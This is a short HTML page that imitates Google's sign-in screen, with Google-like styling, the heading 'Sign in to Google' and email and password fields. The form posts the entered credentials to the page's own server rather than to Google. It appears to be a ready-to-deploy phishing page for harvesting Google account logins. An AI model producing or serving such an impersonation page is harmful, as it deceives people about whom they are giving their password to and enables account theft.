<!DOCTYPE html>
<html>
<head>
    <title>Google Sign-In</title>
    <style>
        body { font-family: Arial, sans-serif; background-color: #fff; margin: 0; padding: 0; }
        .container { max-width: 360px; margin: 60px auto; border: 1px solid #dadce0; padding: 40px; border-radius: 8px; }
        h2 { text-align: center; color: #202124; }
        input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #dadce0; border-radius: 4px; }
        button { width: 100%; padding: 10px; background: #1a73e8; color: white; border: none; border-radius: 4px; font-weight: bold; }
        button:hover { background: #1558b0; }
    </style>
</head>
<body>
    <div class="container">
        <h2>Sign in to Google</h2>
        <form method="POST">
            <input type="email" name="username" placeholder="Email or phone" required>
            <input type="password" name="password" placeholder="Enter your password" required>
            <button type="submit">Next</button>
        </form>
    </div>
</body>
</html>